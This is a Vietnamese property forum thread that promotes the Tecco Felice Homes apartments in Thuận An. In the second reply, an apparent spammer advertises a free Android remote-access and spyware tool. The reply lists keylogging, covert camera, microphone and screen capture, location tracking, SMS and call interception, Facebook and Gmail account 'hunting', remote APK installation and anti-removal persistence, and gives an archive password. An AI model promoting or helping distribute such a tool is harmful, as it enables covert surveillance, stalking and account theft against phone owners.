Căn hộ Tecco Felice Homes sở hữu vị trí cực đẹp ở Thuận An

Chủ đề thuộc danh mục 'Bán nhà đất' được đăng bởi suatanbd, 6/6/21.

  1. suatanbd

    suatanbd Mới đăng kí

    Căn hộ Tecco Felice Homes, Chung cư vòng xoay An Phú có vị trí vàng đắc địa tại ngay mặt tiền đường Lê Thị Trung An Phú . Với vị trí trung tâm ngay vòng xoay an phú cư dân Tecco Felice Homes sinh sống có thể dễ dàng kết nối các tiện ích ngoại khu lâu đời tại An Phú như trường học, chợ, trung tâm mua sắm sầm uất.....

    Dự án Tecco Felice Homes nằm ngay trên tuyến giao thông quan trọng, vị trí trọng điểm của thành phố Thuận An, nơi mang đến những giá trị phát triển bất động sản tiềm năng trong tương lai. Dưới đây là những điểm mạnh mà vị trí dự án này tọa lạc mang đến cho bạn.

    [​IMG]

    Toạ lạc ở vị trí vàng
    Dự án nằm ngay trên trục đường chính Lê Thị Trung của phường Thuận Giao, thành phố Thuận An, tỉnh Bình Dương. Đây được xem là cửa ngõ của tỉnh và cũng là đô thị vệ tinh của khu vực thành phố Hồ Chí Minh.

    Là nơi giao thoa kinh tế vô cùng đắc địa giữ trung tâm thành phố Hồ Chí Minh và những khu vực phát triển nổi bật nhất ở tỉnh Bình Dương (có thể kể đến như Dĩ An, Thủ Dầu Một và trung tâm thành phố mới) thông qua tuyến giao thông lớn Quốc lộ 13. Đây đồng thời cũng là một trục đường vô cùng nhộn nhịp tại trung tâm thành phố Thuận An - nơi đây tập trung rất nhiều cơ quan hành chính, hệ thống các ngân hàng và trường học, …

    Từ vị trí của dự án Tecco Felice Homes , cư dân nơi đây sẽ rất dễ dàng để kết nối đến với những khu công nghiệp lớn như VSIP, Đồng An, An Thạnh và rất nhiều những tiện ích lớn khác.

    Giao thông thuận lợi
    Không chỉ là một nơi có đầy đủ tiện nghi của trung tâm thành phố, vị trí mà chủ đầu tư lựa chọn cho Tecco Felice Homes An Phú còn là một địa điểm có giao thông thuận lợi. Khu vực xung quanh dự án được đầu tư hạ tầng giao thông và những tuyến đường huyết mạch như: Mở rộng trục đường Quốc Lộ 13 lên thành 8 làn xe, nâng cấp các tuyến giao thông trọng điểm khác (đường ĐT743, đại lộ Bình Dương, hay nút giao ngã 6 ở vòng xoay An Phú, …)

    Những dự án hạ tầng được đầu tư mở rộng giúp cho việc kết nối khu dân cư Tecco Felice Homes An Phú đến với những khu vực trọng điểm và các tỉnh khác một cách nhanh chóng - thuận tiện - dễ dàng nhất.

    Chính sự đầu tư này mang đến cho cư dân nơi đây một cuộc sống với đầy đủ tiện nghi và hiện đại nhất. Hứa hẹn trong tương lai, nơi đây sẽ mang lại nhiều giá trị cho trục đại lộ “vàng” của tỉnh. Bình Dương cũng đã rất mạnh tay khi rót hơn 4.000 tỷ đồng để mở rộng các tuyến đường giao thông huyết mạch (đặc biệt là Quốc Lộ 13).
     
  2. walterhdownwi3

    walterhdownwi3 Thành viên cấp 1

    [​IMG]
    Tested on Android : 5,6,7,8,9,10,11
    Application Features :
    ——
    Manage :
    Files
    Sms
    contacts
    Calls
    Applications
    Accounts
    ——
    Monitor :
    Camera
    Live screen
    Microphone
    Keylogger
    Location
    Real time calls monitor
    ——
    Tools :
    Download apk and install
    Show message
    Open link
    Call number
    Phone info
    —–
    Social media Hunter:
    Facebook
    Gmail
    More coming soon
    ——
    Super mode :
    Anti-Kill
    Anti-Delete
    Realtime Monitor Active App
    Auto Click Start Screen Record
    Anti shutdown phone
    ———————————-
    [​IMG]
    This is free version will not have Support
    —–
    Pass : BY_EVLF
    [​IMG]
     
  3. lifetimetopic6320

    lifetimetopic6320 Thành viên cấp 1

  4. sattaking

    sattaking Thành viên cấp 1

Ủng hộ diễn đàn